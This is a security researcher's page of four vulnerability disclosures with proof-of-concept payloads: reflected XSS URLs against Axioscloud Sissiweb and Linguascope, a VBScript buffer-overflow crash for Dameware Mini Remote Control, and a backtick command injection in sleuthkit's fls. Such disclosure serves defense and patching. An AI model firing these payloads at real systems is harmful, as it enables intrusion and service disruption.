Home Canale Youtube Sorgenti Lavori Guide e POC Informazioni Contattami  




Axioscloud Sissiweb Registro Elettronico - 'Error_desc' Reflective Cross Site Script

# Date: 2018-10-11
# Vendor Homepage: http://axiositalia.it/
# Software Link: http://axiositalia.it/?page_id=1907
# Version: 1.7.0/7.0.0
# Category: Webapps
# Platform: ASPX
# CVE-2018-18437
# POC:
# https://family.axioscloud.it/secret/relogoff.aspx?Error_Desc=Sessione%20non%20Validaa%3Cbody%20onload=%22alert(%27ok%27);%22%3E&Error_Parameters=


Linguascope Language Learning Platform - 'Activity' Reflective Cross Site Script

# Date: 2018-11-24
# Vendor Homepage: https://www.linguascope.com
# Category: Webapps
# Platform: PHP
# POC:
# https://www.linguascope.com/secure/students/elementary/html5/bin/main.php?language=english&activity=%22/%3E%3Cscript%3Ealert(%27Hacked%27)%3C/script%3E%3C%22


Dameware Mini Remote Control 10.0 - Buffer Overflow / Denial of Service CVE-2019-9017

# Date: 2019-02-22
# Vendor: Solarwinds
# Tested on: Windows 7 SP1 x64
# CVE ID: CVE-2019-9017
# POC in VB Script
option explicit
dim fold,exe,buf,i,wsh,fso,result
exe = "DWRCC.exe"
fold = "C:\program files\SolarWinds\DameWare Mini Remote Control 10.0 x64 #1\"
for i = 0 to 300
buf = buf & "A"
next
set wsh = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")
if fso.folderexists(fold) then
fold = fold & exe
fold = chr(34) & fold & chr(34)
result = wsh.run(fold & " -c: -h: -m:" & buf,0,true)
end if


OS Command injection vulnerability in sleuthkit fls tool CVE-2022-45639

# Date: 2023-01-20
# CVE-2022-45639
# Vendor Homepage: https://github.com/sleuthkit
# Vulnerability Type: Command injection
# Attack Type: Local
# Version: 4.11.1
# Authors: Dino Barlattani, Giuseppe Granato
# POC:

fls tool is affected by command injection in parameter "-m" when run on linux system.
OS Command injection vulnerability in sleuthkit fls tool 4.11.1 allows attackers to execute arbitrary commands
via a crafted value to the m parameter

when it run on linux, a user can insert in the -m parameter a buffer with backtick with a shell command.
If it run with a web application as front end it can execute commands on the remote server.

The function affected by the vulnerability is "tsk_fs_fls()" from the "fls_lib.c" file

#ifdef TSK_WIN32
   {
   ....
   }
#else

   data.macpre = tpre; <---------------

   return tsk_fs_dir_walk(fs, inode, flags, print_dent_act, &data);

#endif

Run command:

$ fls -m `id` [Options]







 
 






Sostieni il nostro lavoro con un clic! Grazie ;)